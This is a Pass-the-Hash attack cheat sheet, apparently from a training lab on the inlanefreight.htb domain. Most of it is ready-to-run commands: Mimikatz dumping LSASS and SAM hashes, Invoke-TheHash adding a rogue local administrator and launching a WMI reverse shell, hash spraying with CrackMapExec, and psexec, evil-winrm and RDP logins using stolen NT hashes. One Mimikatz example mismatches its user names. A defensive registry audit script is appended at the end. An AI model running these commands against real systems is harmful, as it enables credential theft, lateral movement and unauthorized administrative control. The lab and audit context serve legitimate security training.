# Pass the Hash (PtH) Attack

## Performing Pass the Hash Attacks

***

### 1. **Mimikatz** (Windows)

#### **Mimikatz Pass the Hash Command:**

```bash
mimikatz.exe privilege::debug sekurlsa::pth /user:david /domain:inlanefreight.htb /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /run:cmd.exe exit
```

* Launches `cmd.exe` as `julio`.
* Commands executed in Julio’s context.

#### **Mimikatz Extract Hashes Command**

1. Dump the credentials held in LSASS memory:

```bash
mimikatz.exe privilege::debug sekurlsa::logonpasswords
```

2. Elevate your token and dump the local SAM hashes:

```bash
mimikatz.exe privilege::debug token::elevate lsadump::sam
```

🔗 [Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz)

***

### 2. **Invoke-TheHash** (Windows)

<https://github.com/Kevin-Robertson/Invoke-TheHash>

#### Using SMB Execution:

{% code overflow="wrap" %}

```powershell
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
```

{% endcode %}

#### Reverse Shell via WMI:

1. Start a listener:

```bash
.\nc.exe -lvnp 8001
```

2. Generate reverse shell payload from [Reverse Shell Generator](https://www.revshells.com/).


3. Execute the payload with Invoke-TheHash over WMI:

{% code overflow="wrap" %}

```powershell
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "<Base64 PowerShell Payload>"
```

{% endcode %}

***

### 3. **Impacket-psexec** (Linux)

**PsExec Example:**

{% code overflow="wrap" %}

```bash
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```

{% endcode %}

Other useful tools:

* `impacket-wmiexec`
* `impacket-atexec`
* `impacket-smbexec`

🔗 [Impacket GitHub](https://github.com/fortra/impacket)

***

### 4. **CrackMapExec** (Linux)

**Authentication and Command Execution:**

{% code overflow="wrap" %}

```bash
# Passing the Hash
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453

# Command Execution
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
```

{% endcode %}

> 💬 *Pwn3d!* means administrative access was successfully obtained.

🔗 [NetExec Wiki (formerly CrackMapExec)](https://netexec.readthedocs.io/)

***

### 5. **evil-winrm** (Linux)

**Establish PowerShell Remoting Session:**

```bash
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
```

🔗 [evil-winrm GitHub](https://github.com/Hackplayers/evil-winrm)

***

### 6. Pass the Hash via **RDP** (Linux)

#### Requirements:

* **Restricted Admin Mode** must be enabled.

**Enable Restricted Admin Mode:**

This can be enabled by adding a new registry value `DisableRestrictedAdmin` (REG_DWORD) under `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa` and setting it to 0. It can be done with the following command:

{% code overflow="wrap" %}

```bash
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

{% endcode %}


**Pass the Hash Using RDP:**

```bash
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
```

🔗 [FreeRDP GitHub](https://github.com/FreeRDP/FreeRDP)

***

## ⚠️ UAC Limitations for Local Accounts

UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

* **LocalAccountTokenFilterPolicy** determines if local users (besides built-in admin) can perform remote administration.
* **FilterAdministratorToken** can UAC-protect even the built-in administrator account.

🔗 [Pass-the-Hash is Dead: LocalAccountTokenFilterPolicy](https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-bbc7c81c8797)
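The three registry values covered on this page decide which of the Pass-the-Hash paths above actually work against a given host. The following audit script is an added example, not part of the original page or any of the tools it lists; it assumes it is run locally with rights to read HKLM, and it interprets the values exactly as the text above describes them.

```powershell
# Added audit example: report which Pass-the-Hash paths the UAC and Restricted Admin
# registry values leave open on this host. Value meanings follow the text above.

function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or value does not exist (i.e. the Windows default applies)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$Name
}

$policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$lsa    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

$latfp = Get-RegDword -Path $policy -Name 'LocalAccountTokenFilterPolicy'
$fat   = Get-RegDword -Path $policy -Name 'FilterAdministratorToken'
$dra   = Get-RegDword -Path $lsa    -Name 'DisableRestrictedAdmin'

$findings = @()

# LocalAccountTokenFilterPolicy = 1: every local admin gets a full token over the network,
# so any local admin's NT hash works over SMB/WMI/WinRM. Absent or 0: only RID-500 does.
if ($latfp -eq 1) {
    $findings += [pscustomobject]@{ Setting='LocalAccountTokenFilterPolicy'; Value=$latfp; Risk='High';
        Note='All local admins can perform remote administration; PtH works with any local admin hash.' }
} else {
    $findings += [pscustomobject]@{ Setting='LocalAccountTokenFilterPolicy'; Value=$latfp; Risk='Info';
        Note='Only the built-in Administrator (RID-500) can perform remote administration.' }
}

# FilterAdministratorToken = 1 (with LATFP not 1): UAC filtering also applies to RID-500.
if ($fat -eq 1 -and $latfp -ne 1) {
    $findings += [pscustomobject]@{ Setting='FilterAdministratorToken'; Value=$fat; Risk='Info';
        Note='Built-in Administrator is UAC-filtered as well; its hash does not grant remote admin.' }
} else {
    $findings += [pscustomobject]@{ Setting='FilterAdministratorToken'; Value=$fat; Risk='Medium';
        Note='Built-in Administrator token is not filtered; its NT hash grants full remote admin.' }
}

# DisableRestrictedAdmin = 0 enables Restricted Admin mode, which is what allows PtH over RDP.
if ($dra -eq 0) {
    $findings += [pscustomobject]@{ Setting='DisableRestrictedAdmin'; Value=$dra; Risk='Medium';
        Note='Restricted Admin mode enabled; RDP accepts NT-hash authentication (xfreerdp /pth).' }
} else {
    $findings += [pscustomobject]@{ Setting='DisableRestrictedAdmin'; Value=$dra; Risk='Info';
        Note='Restricted Admin mode disabled (value absent or non-zero); PtH over RDP is not possible.' }
}

$findings | Format-Table -AutoSize
```

A `Value` of blank in the output means the value is not set and the Windows default applies; run the script again after changing a setting to confirm the exposure actually closed.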

***
